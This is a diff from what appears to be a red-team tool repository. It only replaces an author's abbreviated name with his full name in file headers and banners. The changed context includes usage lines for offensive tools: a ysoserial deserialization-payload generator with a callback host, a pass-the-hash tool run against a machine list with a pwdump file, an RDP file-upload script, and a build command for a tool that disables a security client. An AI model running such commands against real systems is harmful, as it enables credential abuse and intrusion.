* Jakub M. / unkn0w
|
* Jakub M. / unkn0w
|
||||||
*
|
*
|
||||||
* Version:
|
* Version:
|
||||||
|
@ -80,7 +80,7 @@ hostname|23:55|~/dev/py-collaborator # python3.7 py-collaborator-server.py -d
|
|||||||
|
|
||||||
:: Cracking the Lens pingback responding server
|
:: Cracking the Lens pingback responding server
|
||||||
Responds to every Out-of-band request correlating them along the way
|
Responds to every Out-of-band request correlating them along the way
|
||||||
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[-] You shall specify all needed MySQL connection data either via program options or config file.
|
[-] You shall specify all needed MySQL connection data either via program options or config file.
|
||||||
[+] Database initialized.
|
[+] Database initialized.
|
||||||
|
@ -211,7 +211,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Cracking the Lens pingback responding server
|
:: Cracking the Lens pingback responding server
|
||||||
Responds to every Out-of-band request correlating them along the way
|
Responds to every Out-of-band request correlating them along the way
|
||||||
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
|
||||||
|
@ -18,7 +18,7 @@
|
|||||||
# - jwt
|
# - jwt
|
||||||
# - anytree
|
# - anytree
|
||||||
#
|
#
|
||||||
# Mariusz B., 2018
|
# Mariusz Banach, 2018
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
@ -26,7 +26,7 @@
|
|||||||
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
|
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
|
||||||
# :: ysoserial payloads generation helper
|
# :: ysoserial payloads generation helper
|
||||||
# Helps generate many variations of payloads to try against vulnerable application.
|
# Helps generate many variations of payloads to try against vulnerable application.
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
# v0.1
|
# v0.1
|
||||||
#
|
#
|
||||||
# [+] Command within payload:
|
# [+] Command within payload:
|
||||||
@ -55,7 +55,7 @@
|
|||||||
#
|
#
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B., '18-19 / <mb@binary-offensive.com>
|
# Mariusz Banach, '18-19 / <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@ -379,7 +379,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: ysoserial payloads generation helper
|
:: ysoserial payloads generation helper
|
||||||
Helps generate many variations of payloads to try against vulnerable application.
|
Helps generate many variations of payloads to try against vulnerable application.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -12,7 +12,7 @@
|
|||||||
* Compilation:
|
* Compilation:
|
||||||
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
|
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
|
||||||
*
|
*
|
||||||
* Mariusz B. / mgeeky, '18-'20
|
* Mariusz Banach / mgeeky, '18-'20
|
||||||
**/
|
**/
|
||||||
|
|
||||||
#include "windows.h"
|
#include "windows.h"
|
||||||
|
@ -13,7 +13,7 @@
|
|||||||
```
|
```
|
||||||
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
|
|
||||||
usage: .\findSymbols.py [options] <path>
|
usage: .\findSymbols.py [options] <path>
|
||||||
@ -117,7 +117,7 @@ PS> python3 rdpFileUpload.py -v -f certutil README.md
|
|||||||
Takes an input file/folder and retypes it into focused RDP session window.
|
Takes an input file/folder and retypes it into focused RDP session window.
|
||||||
That effectively uploads the file into remote host over a RDP channel.
|
That effectively uploads the file into remote host over a RDP channel.
|
||||||
|
|
||||||
Mariusz B. / mgeeky '20, (@mariuszbit)
|
Mariusz Banach / mgeeky '20, (@mariuszbit)
|
||||||
<mb@binary-offensive.com>
|
<mb@binary-offensive.com>
|
||||||
|
|
||||||
[+] Will upload file's contents: "README.md"
|
[+] Will upload file's contents: "README.md"
|
||||||
|
@ -9,7 +9,7 @@
|
|||||||
# - module matching name
|
# - module matching name
|
||||||
# - module NOT matching name
|
# - module NOT matching name
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '21
|
# Mariusz Banach / mgeeky, '21
|
||||||
# <mb [at] binary-offensive.com>
|
# <mb [at] binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
@ -436,7 +436,7 @@ def main():
|
|||||||
out('''
|
out('''
|
||||||
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
|
@ -23,7 +23,7 @@
|
|||||||
# $ ./pth-carpet.py machines.txt pwdump
|
# $ ./pth-carpet.py machines.txt pwdump
|
||||||
#
|
#
|
||||||
# coded by:
|
# coded by:
|
||||||
# Mariusz B., 2016 / mgeeky
|
# Mariusz Banach, 2016 / mgeeky
|
||||||
# version 0.2
|
# version 0.2
|
||||||
#
|
#
|
||||||
# Should be working on Windows boxes as well as on Linux ones.
|
# Should be working on Windows boxes as well as on Linux ones.
|
||||||
@ -172,7 +172,7 @@ def worker(stopevent, pwdump, machine):
|
|||||||
def main():
|
def main():
|
||||||
global OPTIONS
|
global OPTIONS
|
||||||
|
|
||||||
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz B., 2016\n', 'white', attrs=['bold']))
|
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
|
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
|
||||||
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
|
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
|
||||||
|
@ -21,7 +21,7 @@
|
|||||||
# - tqdm
|
# - tqdm
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B. / mgeeky (@mariuszbit), '20
|
# Mariusz Banach / mgeeky (@mariuszbit), '20
|
||||||
# <mb [at] binary-offensive.com>
|
# <mb [at] binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
@ -313,7 +313,7 @@ def parseOptions(argv):
|
|||||||
Takes an input file/folder and retypes it into focused RDP session window.
|
Takes an input file/folder and retypes it into focused RDP session window.
|
||||||
That effectively uploads the file into remote host over a RDP channel.
|
That effectively uploads the file into remote host over a RDP channel.
|
||||||
|
|
||||||
Mariusz B. / mgeeky '20, (@mariuszbit)
|
Mariusz Banach / mgeeky '20, (@mariuszbit)
|
||||||
<mb@binary-offensive.com>
|
<mb@binary-offensive.com>
|
||||||
''')
|
''')